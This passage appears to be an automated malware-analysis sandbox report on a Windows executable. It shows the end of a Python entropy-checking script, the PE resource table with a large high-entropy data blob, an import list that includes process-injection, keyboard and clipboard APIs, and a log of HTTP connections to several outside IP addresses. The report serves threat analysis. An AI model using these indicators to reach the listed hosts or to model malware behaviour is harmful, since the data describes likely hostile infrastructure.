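        print(f"{s['name']:8} {s['virtual_address']:#8x} {s['virtual_size']:#8x} "
              f"{s['raw_size']:#8x} {s['entropy']:8.3f}  {int(s['executable'])} {int(s['writable'])}")
    print("high-entropy sections:", suspicious_sections(secs))
```

Run it with a path to a PE to get the same columns for a real file; entropy alone does not prove packing (a large icon set or an embedded certificate also scores high), so treat a hit as a pointer to what to carve out of that section next, not as a verdict.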
Name           RVA       Size     Type                                                                  Language  Country        ZLIB Complexity
RT_ICON        0xc45a8   0x128    Device independent bitmap graphic, 16 x 32 x 4, image size 192        English   Great Britain  0.7466216216216216
RT_ICON        0xc46d0   0x128    Device independent bitmap graphic, 16 x 32 x 4, image size 128, 16 important colors  English   Great Britain  0.3277027027027027
RT_ICON        0xc47f8   0x128    Device independent bitmap graphic, 16 x 32 x 4, image size 192        English   Great Britain  0.3885135135135135
RT_ICON        0xc4920   0x2e8    Device independent bitmap graphic, 32 x 64 x 4, image size 0          English   Great Britain  0.3333333333333333
RT_ICON        0xc4c08   0x128    Device independent bitmap graphic, 16 x 32 x 4, image size 0          English   Great Britain  0.5
RT_ICON        0xc4d30   0xea8    Device independent bitmap graphic, 48 x 96 x 8, image size 0          English   Great Britain  0.2835820895522388
RT_ICON        0xc5bd8   0x8a8    Device independent bitmap graphic, 32 x 64 x 8, image size 0          English   Great Britain  0.37906137184115524
RT_ICON        0xc6480   0x568    Device independent bitmap graphic, 16 x 32 x 8, image size 0          English   Great Britain  0.23699421965317918
RT_ICON        0xc69e8   0x25a8   Device independent bitmap graphic, 48 x 96 x 32, image size 0         English   Great Britain  0.13858921161825727
RT_ICON        0xc8f90   0x10a8   Device independent bitmap graphic, 32 x 64 x 32, image size 0         English   Great Britain  0.25070356472795496
RT_ICON        0xca038   0x468    Device independent bitmap graphic, 16 x 32 x 32, image size 0         English   Great Britain  0.3173758865248227
RT_MENU        0xca4a0   0x50     data                                                                  English   Great Britain  0.9
RT_STRING      0xca4f0   0x594    data                                                                  English   Great Britain  0.3333333333333333
RT_STRING      0xcaa84   0x68a    data                                                                  English   Great Britain  0.2747909199522103
RT_STRING      0xcb110   0x490    data                                                                  English   Great Britain  0.3715753424657534
RT_STRING      0xcb5a0   0x5fc    data                                                                  English   Great Britain  0.3087467362924282
RT_STRING      0xcbb9c   0x65c    data                                                                  English   Great Britain  0.34336609336609336
RT_STRING      0xcc1f8   0x466    data                                                                  English   Great Britain  0.3605683836589698
RT_STRING      0xcc660   0x158    Matlab v4 mat-file (little endian) n, numeric, rows 0, columns 0      English   Great Britain  0.502906976744186
RT_RCDATA      0xcc7b8   0x57851  data                                                                  -         -              1.0003235875820475
RT_GROUP_ICON  0x12400c  0x76     data                                                                  English   Great Britain  0.6610169491525424
RT_GROUP_ICON  0x124084  0x14     data                                                                  English   Great Britain  1.25
RT_GROUP_ICON  0x124098  0x14     data                                                                  English   Great Britain  1.15
RT_GROUP_ICON  0x1240ac  0x14     data                                                                  English   Great Britain  1.25
RT_VERSION     0x1240c0  0xdc     data                                                                  English   Great Britain  0.6181818181818182
RT_MANIFEST    0x12419c  0x3b0    ASCII text, with CRLF line terminators                                English   Great Britain  0.5116525423728814
DLL           Import
WSOCK32.dll:  __WSAFDIsSet, recv, send, setsockopt, ntohs, recvfrom, select, WSAStartup, htons, accept, listen, bind, closesocket, connect, WSACleanup, ioctlsocket, sendto, WSAGetLastError, inet_addr, gethostbyname, gethostname, socket
VERSION.dll:  GetFileVersionInfoW, VerQueryValueW, GetFileVersionInfoSizeW
WINMM.dll:    timeGetTime, waveOutSetVolume, mciSendStringW
COMCTL32.dll: ImageList_Destroy, ImageList_Remove, ImageList_SetDragCursorImage, ImageList_BeginDrag, ImageList_DragEnter, ImageList_DragLeave, ImageList_EndDrag, ImageList_DragMove, ImageList_Create, InitCommonControlsEx, ImageList_ReplaceIcon
MPR.dll:      WNetUseConnectionW, WNetCancelConnection2W, WNetGetConnectionW, WNetAddConnection2W
WININET.dll:  InternetReadFile, InternetCloseHandle, InternetOpenW, InternetSetOptionW, InternetCrackUrlW, HttpQueryInfoW, InternetQueryOptionW, HttpOpenRequestW, HttpSendRequestW, FtpOpenFileW, FtpGetFileSize, InternetOpenUrlW, InternetConnectW, InternetQueryDataAvailable
PSAPI.DLL:    GetProcessMemoryInfo
IPHLPAPI.DLL: IcmpCreateFile, IcmpCloseHandle, IcmpSendEcho
USERENV.dll:  UnloadUserProfile, DestroyEnvironmentBlock, CreateEnvironmentBlock, LoadUserProfileW
UxTheme.dll:  IsThemeActive
KERNEL32.dll: HeapAlloc, GetProcessHeap, HeapFree, Sleep, GetCurrentThreadId, MultiByteToWideChar, MulDiv, GetVersionExW, GetSystemInfo, FreeLibrary, LoadLibraryA, GetProcAddress, SetErrorMode, GetModuleFileNameW, WideCharToMultiByte, lstrcpyW, lstrlenW, GetModuleHandleW, QueryPerformanceCounter, VirtualFreeEx, OpenProcess, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, CreateFileW, SetFilePointerEx, ReadFile, WriteFile, FlushFileBuffers, TerminateProcess, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, SetFileTime, GetFileAttributesW, FindFirstFileW, FindClose, GetLongPathNameW, GetCurrentThread, FindNextFileW, MoveFileW, CopyFileW, CreateDirectoryW, RemoveDirectoryW, SetSystemPowerState, QueryPerformanceFrequency, FindResourceW, LoadResource, LockResource, SizeofResource, EnumResourceNamesW, OutputDebugStringW, GetTempPathW, GetTempFileNameW, DeviceIoControl, GetLocalTime, CompareStringW, DeleteCriticalSection, WaitForSingleObject, LeaveCriticalSection, GetStdHandle, CreatePipe, InterlockedExchange, TerminateThread, LoadLibraryExW, FindResourceExW, VirtualFree, FormatMessageW, GetExitCodeProcess, GetPrivateProfileStringW, WritePrivateProfileStringW, GetPrivateProfileSectionW, WritePrivateProfileSectionW, GetPrivateProfileSectionNamesW, FileTimeToLocalFileTime, FileTimeToSystemTime, SystemTimeToFileTime, LocalFileTimeToFileTime, GetDriveTypeW, GetDiskFreeSpaceExW, GetDiskFreeSpaceW, GetVolumeInformationW, SetVolumeLabelW, CreateHardLinkW, SetFileAttributesW, GetShortPathNameW, CreateEventW, SetEvent, GetEnvironmentVariableW, SetEnvironmentVariableW, GlobalLock, GlobalUnlock, GlobalAlloc, GetFileSize, GlobalFree, GlobalMemoryStatusEx, Beep, GetSystemDirectoryW, GetComputerNameW, GetWindowsDirectoryW, GetCurrentProcessId, GetProcessIoCounters, CreateProcessW, SetPriorityClass, LoadLibraryW, VirtualAlloc, CloseHandle, GetLastError, GetFullPathNameW, SetCurrentDirectoryW, IsDebuggerPresent, GetCurrentDirectoryW, lstrcmpiW, RaiseException, InitializeCriticalSectionAndSpinCount, InterlockedDecrement, InterlockedIncrement, CreateThread, DuplicateHandle, EnterCriticalSection, GetCurrentProcess, ExitProcess, GetModuleHandleExW, ExitThread, GetSystemTimeAsFileTime, ResumeThread, GetCommandLineW, IsProcessorFeaturePresent, HeapSize, IsValidCodePage, GetACP, GetOEMCP, GetCPInfo, SetLastError, UnhandledExceptionFilter, SetUnhandledExceptionFilter, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, GetStartupInfoW, GetStringTypeW, SetStdHandle, GetFileType, GetConsoleCP, GetConsoleMode, RtlUnwind, ReadConsoleW, SetFilePointer, GetTimeZoneInformation, GetDateFormatW, GetTimeFormatW, LCMapStringW, GetEnvironmentStringsW, FreeEnvironmentStringsW, HeapReAlloc, WriteConsoleW, SetEndOfFile, DeleteFileW, SetEnvironmentVariableA
USER32.dll:   SetWindowPos, GetCursorInfo, RegisterHotKey, ClientToScreen, GetKeyboardLayoutNameW, IsCharAlphaW, IsCharAlphaNumericW, IsCharLowerW, IsCharUpperW, GetMenuStringW, GetSubMenu, GetCaretPos, IsZoomed, MonitorFromPoint, GetMonitorInfoW, SetWindowLongW, SetLayeredWindowAttributes, FlashWindow, GetClassLongW, TranslateAcceleratorW, IsDialogMessageW, GetSysColor, InflateRect, DrawFocusRect, DrawTextW, FrameRect, DrawFrameControl, FillRect, PtInRect, DestroyAcceleratorTable, CreateAcceleratorTableW, SetCursor, GetWindowDC, GetSystemMetrics, DrawMenuBar, GetActiveWindow, CharNextW, wsprintfW, RedrawWindow, DestroyMenu, SetMenu, GetWindowTextLengthW, CreateMenu, IsDlgButtonChecked, DefDlgProcW, CallWindowProcW, ReleaseCapture, SetCapture, MonitorFromRect, LoadImageW, CreateIconFromResourceEx, mouse_event, ExitWindowsEx, SetActiveWindow, FindWindowExW, EnumThreadWindows, SetMenuDefaultItem, InsertMenuItemW, IsMenu, TrackPopupMenuEx, GetCursorPos, CopyImage, CheckMenuRadioItem, GetMenuItemID, GetMenuItemCount, SetMenuItemInfoW, GetMenuItemInfoW, SetForegroundWindow, IsIconic, FindWindowW, UnregisterHotKey, keybd_event, SendInput, GetAsyncKeyState, SetKeyboardState, GetKeyboardState, GetKeyState, VkKeyScanW, LoadStringW, DialogBoxParamW, MessageBeep, EndDialog, SendDlgItemMessageW, GetDlgItem, SetWindowTextW, CopyRect, ReleaseDC, GetDC, EndPaint, BeginPaint, GetClientRect, GetMenu, DestroyWindow, EnumWindows, GetDesktopWindow, IsWindow, IsWindowEnabled, IsWindowVisible, EnableWindow, InvalidateRect, GetWindowLongW, GetWindowThreadProcessId, AttachThreadInput, GetFocus, ScreenToClient, SendMessageTimeoutW, EnumChildWindows, CharUpperBuffW, GetClassNameW, GetParent, GetDlgCtrlID, SendMessageW, MapVirtualKeyW, PostMessageW, GetWindowRect, SetUserObjectSecurity, CloseDesktop, CloseWindowStation, OpenDesktopW, SetProcessWindowStation, GetProcessWindowStation, OpenWindowStationW, GetUserObjectSecurity, AdjustWindowRectEx, SetRect, SetClipboardData, EmptyClipboard, CountClipboardFormats, CloseClipboard, GetClipboardData, IsClipboardFormatAvailable, OpenClipboard, BlockInput, GetMessageW, LockWindowUpdate, DispatchMessageW, TranslateMessage, DeleteMenu, PeekMessageW, MessageBoxW, DefWindowProcW, MoveWindow, SetFocus, PostQuitMessage, KillTimer, CreatePopupMenu, RegisterWindowMessageW, SetTimer, ShowWindow, CreateWindowExW, RegisterClassExW, LoadIconW, LoadCursorW, GetSysColorBrush, GetForegroundWindow, MessageBoxA, DestroyIcon, SystemParametersInfoW, CharLowerBuffW, GetWindowTextW
GDI32.dll:    SetPixel, DeleteObject, GetTextExtentPoint32W, ExtCreatePen, StrokeAndFillPath, StrokePath, GetDeviceCaps, CloseFigure, LineTo, AngleArc, CreateCompatibleBitmap, CreateCompatibleDC, MoveToEx, Ellipse, PolyDraw, BeginPath, SelectObject, StretchBlt, GetDIBits, DeleteDC, GetPixel, CreateDCW, GetStockObject, Rectangle, SetViewportOrgEx, GetObjectW, SetBkMode, RoundRect, SetBkColor, CreatePen, CreateSolidBrush, SetTextColor, CreateFontW, GetTextFaceW, EndPath
COMDLG32.dll: GetSaveFileNameW, GetOpenFileNameW
ADVAPI32.dll: GetAclInformation, RegEnumValueW, RegDeleteValueW, RegDeleteKeyW, RegEnumKeyExW, RegSetValueExW, RegCreateKeyExW, GetUserNameW, RegOpenKeyExW, RegCloseKey, RegQueryValueExW, RegConnectRegistryW, InitializeSecurityDescriptor, InitializeAcl, AdjustTokenPrivileges, OpenThreadToken, OpenProcessToken, LookupPrivilegeValueW, DuplicateTokenEx, CreateProcessAsUserW, CreateProcessWithLogonW, GetLengthSid, CopySid, InitiateSystemShutdownExW, LogonUserW, AllocateAndInitializeSid, CheckTokenMembership, FreeSid, GetTokenInformation, GetSecurityDescriptorDacl, SetSecurityDescriptorDacl, AddAce, GetAce
SHELL32.dll:  DragQueryPoint, ShellExecuteExW, DragQueryFileW, SHEmptyRecycleBinW, SHGetPathFromIDListW, SHBrowseForFolderW, SHCreateShellItem, SHGetDesktopFolder, SHGetSpecialFolderLocation, SHGetFolderPathW, SHFileOperationW, ExtractIconExW, Shell_NotifyIconW, ShellExecuteW, DragFinish
ole32.dll:    CoTaskMemAlloc, CoTaskMemFree, CLSIDFromString, ProgIDFromCLSID, CLSIDFromProgID, OleSetMenuDescriptor, MkParseDisplayName, OleSetContainedObject, CoCreateInstance, IIDFromString, StringFromGUID2, CreateStreamOnHGlobal, CoInitialize, CoUninitialize, GetRunningObjectTable, CoGetInstanceFromFile, CoGetObject, CoInitializeSecurity, CoCreateInstanceEx, CoSetProxyBlanket
OLEAUT32.dll: RegisterTypeLib, LoadTypeLibEx, VariantCopyInd, SysReAllocString, SysFreeString, SafeArrayDestroyDescriptor, SafeArrayDestroyData, SafeArrayUnaccessData, SafeArrayAccessData, SafeArrayAllocData, UnRegisterTypeLib, SafeArrayCreateVector, SysAllocString, SysStringLen, VariantTimeToSystemTime, VarR8FromDec, SafeArrayGetVartype, OleLoadPicture, QueryPathOfRegTypeLib, VariantCopy, VariantClear, CreateDispTypeInfo, CreateStdDispatch, DispCallFunc, VariantChangeType, SafeArrayAllocDescriptorEx, VariantInit
Language of compilation system  Country where language is spoken  Map
English                         Great Britain
Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                                                                                                Nov 18, 2024 16:26:43.631087065 CET805000247.242.89.146192.168.2.6
                                                                                                                                Nov 18, 2024 16:26:43.631191969 CET5000280192.168.2.647.242.89.146
                                                                                                                                Nov 18, 2024 16:26:43.638916016 CET5000280192.168.2.647.242.89.146
                                                                                                                                Nov 18, 2024 16:26:43.644586086 CET805000247.242.89.146192.168.2.6
                                                                                                                                Nov 18, 2024 16:26:44.607912064 CET805000247.242.89.146192.168.2.6
                                                                                                                                Nov 18, 2024 16:26:44.788152933 CET5000280192.168.2.647.242.89.146
                                                                                                                                Nov 18, 2024 16:26:44.793886900 CET805000247.242.89.146192.168.2.6
                                                                                                                                Nov 18, 2024 16:26:44.794193983 CET5000280192.168.2.647.242.89.146
                                                                                                                                Nov 18, 2024 16:26:44.797152042 CET5000280192.168.2.647.242.89.146
                                                                                                                                Nov 18, 2024 16:26:44.802278996 CET805000247.242.89.146192.168.2.6
                                                                                                                                Nov 18, 2024 16:26:49.862319946 CET5000380192.168.2.6128.65.195.180
                                                                                                                                Nov 18, 2024 16:26:49.867492914 CET8050003128.65.195.180192.168.2.6
                                                                                                                                Nov 18, 2024 16:26:49.867593050 CET5000380192.168.2.6128.65.195.180
                                                                                                                                Nov 18, 2024 16:26:49.877959967 CET5000380192.168.2.6128.65.195.180
                                                                                                                                Nov 18, 2024 16:26:49.883074999 CET8050003128.65.195.180192.168.2.6
                                                                                                                                Nov 18, 2024 16:26:51.387584925 CET5000380192.168.2.6128.65.195.180
                                                                                                                                Nov 18, 2024 16:26:51.393429995 CET8050003128.65.195.180192.168.2.6
                                                                                                                                Nov 18, 2024 16:26:51.393496990 CET5000380192.168.2.6128.65.195.180
                                                                                                                                Nov 18, 2024 16:26:52.408365965 CET5000480192.168.2.6128.65.195.180
                                                                                                                                Nov 18, 2024 16:26:52.413625956 CET8050004128.65.195.180192.168.2.6
                                                                                                                                Nov 18, 2024 16:26:52.420370102 CET5000480192.168.2.6128.65.195.180
                                                                                                                                Nov 18, 2024 16:26:52.428956985 CET5000480192.168.2.6128.65.195.180
                                                                                                                                Nov 18, 2024 16:26:52.434062004 CET8050004128.65.195.180192.168.2.6
                                                                                                                                Nov 18, 2024 16:26:53.934617996 CET5000480192.168.2.6128.65.195.180
                                                                                                                                Nov 18, 2024 16:26:53.940350056 CET8050004128.65.195.180192.168.2.6
                                                                                                                                Nov 18, 2024 16:26:53.950443029 CET5000480192.168.2.6128.65.195.180
                                                                                                                                Nov 18, 2024 16:26:54.954363108 CET5000580192.168.2.6128.65.195.180
                                                                                                                                Nov 18, 2024 16:26:54.959341049 CET8050005128.65.195.180192.168.2.6
                                                                                                                                Nov 18, 2024 16:26:54.959420919 CET5000580192.168.2.6128.65.195.180
                                                                                                                                Nov 18, 2024 16:26:54.973051071 CET5000580192.168.2.6128.65.195.180
                                                                                                                                Nov 18, 2024 16:26:54.978463888 CET8050005128.65.195.180192.168.2.6
                                                                                                                                Nov 18, 2024 16:26:54.979538918 CET8050005128.65.195.180192.168.2.6
                                                                                                                                Nov 18, 2024 16:26:56.481405020 CET5000580192.168.2.6128.65.195.180
                                                                                                                                Nov 18, 2024 16:26:56.487224102 CET8050005128.65.195.180192.168.2.6
                                                                                                                                Nov 18, 2024 16:26:56.487301111 CET5000580192.168.2.6128.65.195.180
                                                                                                                                Nov 18, 2024 16:26:57.500288963 CET5000680192.168.2.6128.65.195.180
                                                                                                                                Nov 18, 2024 16:26:57.506026030 CET8050006128.65.195.180192.168.2.6
                                                                                                                                Nov 18, 2024 16:26:57.509270906 CET5000680192.168.2.6128.65.195.180
                                                                                                                                Nov 18, 2024 16:26:57.513317108 CET5000680192.168.2.6128.65.195.180
                                                                                                                                Nov 18, 2024 16:26:57.519217014 CET8050006128.65.195.180192.168.2.6
                                                                                                                                Nov 18, 2024 16:26:59.802262068 CET8050006128.65.195.180192.168.2.6
                                                                                                                                Nov 18, 2024 16:26:59.856288910 CET5000680192.168.2.6128.65.195.180
                                                                                                                                Nov 18, 2024 16:26:59.923259974 CET8050006128.65.195.180192.168.2.6
                                                                                                                                Nov 18, 2024 16:26:59.923423052 CET5000680192.168.2.6128.65.195.180
                                                                                                                                Nov 18, 2024 16:26:59.926404953 CET5000680192.168.2.6128.65.195.180
                                                                                                                                Nov 18, 2024 16:26:59.931329966 CET8050006128.65.195.180192.168.2.6
                                                                                                                                Nov 18, 2024 16:27:05.033452034 CET5000780192.168.2.6217.70.184.50
                                                                                                                                Nov 18, 2024 16:27:05.038501024 CET8050007217.70.184.50192.168.2.6
                                                                                                                                Nov 18, 2024 16:27:05.038595915 CET5000780192.168.2.6217.70.184.50
                                                                                                                                Nov 18, 2024 16:27:05.050431013 CET5000780192.168.2.6217.70.184.50
                                                                                                                                Nov 18, 2024 16:27:05.055483103 CET8050007217.70.184.50192.168.2.6
                                                                                                                                Nov 18, 2024 16:27:05.856203079 CET8050007217.70.184.50192.168.2.6
                                                                                                                                Nov 18, 2024 16:27:05.903307915 CET5000780192.168.2.6217.70.184.50
                                                                                                                                Nov 18, 2024 16:27:05.965643883 CET8050007217.70.184.50192.168.2.6
                                                                                                                                Nov 18, 2024 16:27:05.966367006 CET5000780192.168.2.6217.70.184.50
                                                                                                                                Nov 18, 2024 16:27:06.559721947 CET5000780192.168.2.6217.70.184.50
                                                                                                                                Nov 18, 2024 16:27:07.580571890 CET5000880192.168.2.6217.70.184.50
                                                                                                                                Nov 18, 2024 16:27:07.585827112 CET8050008217.70.184.50192.168.2.6
                                                                                                                                Nov 18, 2024 16:27:07.592295885 CET5000880192.168.2.6217.70.184.50
                                                                                                                                Nov 18, 2024 16:27:07.600482941 CET5000880192.168.2.6217.70.184.50
                                                                                                                                Nov 18, 2024 16:27:07.605705976 CET8050008217.70.184.50192.168.2.6
                                                                                                                                Nov 18, 2024 16:27:08.412798882 CET8050008217.70.184.50192.168.2.6
                                                                                                                                Nov 18, 2024 16:27:08.520956993 CET8050008217.70.184.50192.168.2.6
                                                                                                                                Nov 18, 2024 16:27:08.521017075 CET5000880192.168.2.6217.70.184.50
                                                                                                                                Nov 18, 2024 16:27:09.106441975 CET5000880192.168.2.6217.70.184.50
                                                                                                                                Nov 18, 2024 16:27:10.125317097 CET5000980192.168.2.6217.70.184.50
                                                                                                                                Nov 18, 2024 16:27:10.130409956 CET8050009217.70.184.50192.168.2.6
                                                                                                                                Nov 18, 2024 16:27:10.134506941 CET5000980192.168.2.6217.70.184.50
                                                                                                                                Nov 18, 2024 16:27:10.146294117 CET5000980192.168.2.6217.70.184.50
                                                                                                                                Nov 18, 2024 16:27:10.151154041 CET8050009217.70.184.50192.168.2.6
                                                                                                                                Nov 18, 2024 16:27:10.152239084 CET8050009217.70.184.50192.168.2.6
                                                                                                                                Nov 18, 2024 16:27:10.955631971 CET8050009217.70.184.50192.168.2.6
                                                                                                                                Nov 18, 2024 16:27:11.028196096 CET5000980192.168.2.6217.70.184.50
                                                                                                                                Nov 18, 2024 16:27:11.064963102 CET8050009217.70.184.50192.168.2.6
                                                                                                                                Nov 18, 2024 16:27:11.065030098 CET5000980192.168.2.6217.70.184.50
                                                                                                                                Nov 18, 2024 16:27:11.678343058 CET5000980192.168.2.6217.70.184.50
                                                                                                                                Nov 18, 2024 16:27:12.708012104 CET5001180192.168.2.6217.70.184.50
                                                                                                                                Nov 18, 2024 16:27:12.712985039 CET8050011217.70.184.50192.168.2.6
                                                                                                                                Nov 18, 2024 16:27:12.713088036 CET5001180192.168.2.6217.70.184.50
                                                                                                                                Nov 18, 2024 16:27:12.724095106 CET5001180192.168.2.6217.70.184.50
                                                                                                                                Nov 18, 2024 16:27:12.729088068 CET8050011217.70.184.50192.168.2.6
                                                                                                                                Nov 18, 2024 16:27:13.519913912 CET8050011217.70.184.50192.168.2.6
                                                                                                                                Nov 18, 2024 16:27:13.519984961 CET8050011217.70.184.50192.168.2.6
                                                                                                                                Nov 18, 2024 16:27:13.519999027 CET8050011217.70.184.50192.168.2.6
                                                                                                                                Nov 18, 2024 16:27:13.520168066 CET5001180192.168.2.6217.70.184.50
                                                                                                                                Nov 18, 2024 16:27:13.628834963 CET8050011217.70.184.50192.168.2.6
                                                                                                                                Nov 18, 2024 16:27:13.631386995 CET5001180192.168.2.6217.70.184.50
                                                                                                                                Nov 18, 2024 16:27:13.631386995 CET5001180192.168.2.6217.70.184.50
                                                                                                                                Nov 18, 2024 16:27:13.636233091 CET8050011217.70.184.50192.168.2.6
                                                                                                                                Nov 18, 2024 16:27:18.662339926 CET5001280192.168.2.63.33.130.190
                                                                                                                                Nov 18, 2024 16:27:18.669598103 CET80500123.33.130.190192.168.2.6
                                                                                                                                Nov 18, 2024 16:27:18.669694901 CET5001280192.168.2.63.33.130.190
                                                                                                                                Nov 18, 2024 16:27:18.693389893 CET5001280192.168.2.63.33.130.190
                                                                                                                                Nov 18, 2024 16:27:18.698785067 CET80500123.33.130.190192.168.2.6
                                                                                                                                Nov 18, 2024 16:27:20.200161934 CET5001280192.168.2.63.33.130.190
                                                                                                                                Nov 18, 2024 16:27:20.249994993 CET80500123.33.130.190192.168.2.6
                                                                                                                                Nov 18, 2024 16:27:21.219321966 CET5001380192.168.2.63.33.130.190
                                                                                                                                Nov 18, 2024 16:27:21.224498987 CET80500133.33.130.190192.168.2.6
                                                                                                                                Nov 18, 2024 16:27:21.224591970 CET5001380192.168.2.63.33.130.190
                                                                                                                                Nov 18, 2024 16:27:21.234764099 CET5001380192.168.2.63.33.130.190
                                                                                                                                Nov 18, 2024 16:27:21.239928961 CET80500133.33.130.190192.168.2.6
                                                                                                                                Nov 18, 2024 16:27:22.750330925 CET5001380192.168.2.63.33.130.190
                                                                                                                                Nov 18, 2024 16:27:22.758256912 CET80500133.33.130.190192.168.2.6
                                                                                                                                Nov 18, 2024 16:27:22.758316040 CET5001380192.168.2.63.33.130.190
                                                                                                                                Nov 18, 2024 16:27:23.765769958 CET5001480192.168.2.63.33.130.190
                                                                                                                                Nov 18, 2024 16:27:23.771049023 CET80500143.33.130.190192.168.2.6
                                                                                                                                Nov 18, 2024 16:27:23.774416924 CET5001480192.168.2.63.33.130.190
                                                                                                                                Nov 18, 2024 16:27:23.786346912 CET5001480192.168.2.63.33.130.190
                                                                                                                                Nov 18, 2024 16:27:23.791425943 CET80500143.33.130.190192.168.2.6
                                                                                                                                Nov 18, 2024 16:27:23.791655064 CET80500143.33.130.190192.168.2.6
                                                                                                                                Nov 18, 2024 16:27:24.408828020 CET80500143.33.130.190192.168.2.6
                                                                                                                                Nov 18, 2024 16:27:24.408987999 CET5001480192.168.2.63.33.130.190
                                                                                                                                Nov 18, 2024 16:27:25.293922901 CET5001480192.168.2.63.33.130.190
                                                                                                                                Nov 18, 2024 16:27:25.298855066 CET80500143.33.130.190192.168.2.6
                                                                                                                                Nov 18, 2024 16:27:26.314430952 CET5001580192.168.2.63.33.130.190
                                                                                                                                Nov 18, 2024 16:27:26.319395065 CET80500153.33.130.190192.168.2.6
                                                                                                                                Nov 18, 2024 16:27:26.322438955 CET5001580192.168.2.63.33.130.190
                                                                                                                                Nov 18, 2024 16:27:26.330338955 CET5001580192.168.2.63.33.130.190
                                                                                                                                Nov 18, 2024 16:27:26.330630064 CET80500123.33.130.190192.168.2.6
                                                                                                                                Nov 18, 2024 16:27:26.334422112 CET5001280192.168.2.63.33.130.190
                                                                                                                                Nov 18, 2024 16:27:26.335305929 CET80500153.33.130.190192.168.2.6
                                                                                                                                Nov 18, 2024 16:27:27.963671923 CET80500153.33.130.190192.168.2.6
                                                                                                                                Nov 18, 2024 16:27:27.963711023 CET80500153.33.130.190192.168.2.6
                                                                                                                                Nov 18, 2024 16:27:27.963742018 CET80500153.33.130.190192.168.2.6
                                                                                                                                Nov 18, 2024 16:27:27.963879108 CET5001580192.168.2.63.33.130.190
                                                                                                                                Nov 18, 2024 16:27:27.964231968 CET80500153.33.130.190192.168.2.6
                                                                                                                                Nov 18, 2024 16:27:27.964373112 CET5001580192.168.2.63.33.130.190
                                                                                                                                Nov 18, 2024 16:27:27.964639902 CET80500153.33.130.190192.168.2.6
                                                                                                                                Nov 18, 2024 16:27:27.964817047 CET5001580192.168.2.63.33.130.190
                                                                                                                                Nov 18, 2024 16:27:27.966927052 CET5001580192.168.2.63.33.130.190
                                                                                                                                Nov 18, 2024 16:27:27.973272085 CET80500153.33.130.190192.168.2.6
                                                                                                                                Nov 18, 2024 16:27:33.004089117 CET5001680192.168.2.63.33.130.190
                                                                                                                                Nov 18, 2024 16:27:33.009422064 CET80500163.33.130.190192.168.2.6
                                                                                                                                Nov 18, 2024 16:27:33.009497881 CET5001680192.168.2.63.33.130.190
                                                                                                                                Nov 18, 2024 16:27:33.021816015 CET5001680192.168.2.63.33.130.190
                                                                                                                                Nov 18, 2024 16:27:33.026786089 CET80500163.33.130.190192.168.2.6
                                                                                                                                Nov 18, 2024 16:27:33.705888033 CET80500163.33.130.190192.168.2.6
                                                                                                                                Nov 18, 2024 16:27:33.706718922 CET5001680192.168.2.63.33.130.190
                                                                                                                                Nov 18, 2024 16:27:34.528711081 CET5001680192.168.2.63.33.130.190
                                                                                                                                Nov 18, 2024 16:27:34.535698891 CET80500163.33.130.190192.168.2.6
                                                                                                                                Nov 18, 2024 16:27:35.547231913 CET5001780192.168.2.63.33.130.190
                                                                                                                                Nov 18, 2024 16:27:35.552491903 CET80500173.33.130.190192.168.2.6
                                                                                                                                Nov 18, 2024 16:27:35.552690029 CET5001780192.168.2.63.33.130.190
                                                                                                                                Nov 18, 2024 16:28:32.345583916 CET5003180192.168.2.6208.91.197.27
                                                                                                                                Nov 18, 2024 16:28:32.354233980 CET8050031208.91.197.27192.168.2.6
                                                                                                                                Nov 18, 2024 16:28:32.354329109 CET8050031208.91.197.27192.168.2.6
                                                                                                                                Nov 18, 2024 16:28:32.354379892 CET8050031208.91.197.27192.168.2.6
                                                                                                                                Nov 18, 2024 16:28:32.354437113 CET5003180192.168.2.6208.91.197.27
                                                                                                                                Nov 18, 2024 16:28:32.354538918 CET5003180192.168.2.6208.91.197.27
                                                                                                                                Nov 18, 2024 16:28:32.360948086 CET8050031208.91.197.27192.168.2.6
                                                                                                                                Nov 18, 2024 16:28:32.360992908 CET8050031208.91.197.27192.168.2.6
                                                                                                                                Nov 18, 2024 16:28:32.361006021 CET8050031208.91.197.27192.168.2.6
                                                                                                                                Nov 18, 2024 16:28:32.361334085 CET5003180192.168.2.6208.91.197.27
                                                                                                                                Nov 18, 2024 16:28:32.404599905 CET8050031208.91.197.27192.168.2.6
                                                                                                                                Nov 18, 2024 16:28:32.405019045 CET8050031208.91.197.27192.168.2.6
                                                                                                                                Nov 18, 2024 16:28:32.405034065 CET8050031208.91.197.27192.168.2.6
                                                                                                                                Nov 18, 2024 16:28:32.405214071 CET5003180192.168.2.6208.91.197.27
                                                                                                                                Nov 18, 2024 16:28:32.405214071 CET5003180192.168.2.6208.91.197.27
                                                                                                                                Nov 18, 2024 16:28:32.410662889 CET5003180192.168.2.6208.91.197.27
                                                                                                                                Nov 18, 2024 16:28:32.415585041 CET8050031208.91.197.27192.168.2.6
                                                                                                                                Nov 18, 2024 16:28:37.466499090 CET5003380192.168.2.63.33.130.190
                                                                                                                                Nov 18, 2024 16:28:37.473195076 CET80500333.33.130.190192.168.2.6
                                                                                                                                Nov 18, 2024 16:28:37.473294973 CET5003380192.168.2.63.33.130.190
                                                                                                                                Nov 18, 2024 16:28:37.483262062 CET5003380192.168.2.63.33.130.190
                                                                                                                                Nov 18, 2024 16:28:37.488369942 CET80500333.33.130.190192.168.2.6
                                                                                                                                Nov 18, 2024 16:28:38.101088047 CET80500333.33.130.190192.168.2.6
                                                                                                                                Nov 18, 2024 16:28:38.102653980 CET5003380192.168.2.63.33.130.190
                                                                                                                                Nov 18, 2024 16:28:39.004038095 CET5003380192.168.2.63.33.130.190
                                                                                                                                Nov 18, 2024 16:28:39.009402037 CET80500333.33.130.190192.168.2.6
                                                                                                                                Nov 18, 2024 16:28:40.017354965 CET5003480192.168.2.63.33.130.190
                                                                                                                                Nov 18, 2024 16:28:40.022510052 CET80500343.33.130.190192.168.2.6
                                                                                                                                Nov 18, 2024 16:28:40.024665117 CET5003480192.168.2.63.33.130.190
                                                                                                                                Nov 18, 2024 16:28:40.034811020 CET5003480192.168.2.63.33.130.190
                                                                                                                                Nov 18, 2024 16:28:40.039812088 CET80500343.33.130.190192.168.2.6
                                                                                                                                Nov 18, 2024 16:28:40.737999916 CET80500343.33.130.190192.168.2.6
                                                                                                                                Nov 18, 2024 16:28:40.738063097 CET5003480192.168.2.63.33.130.190
                                                                                                                                Nov 18, 2024 16:28:41.561115980 CET5003480192.168.2.63.33.130.190
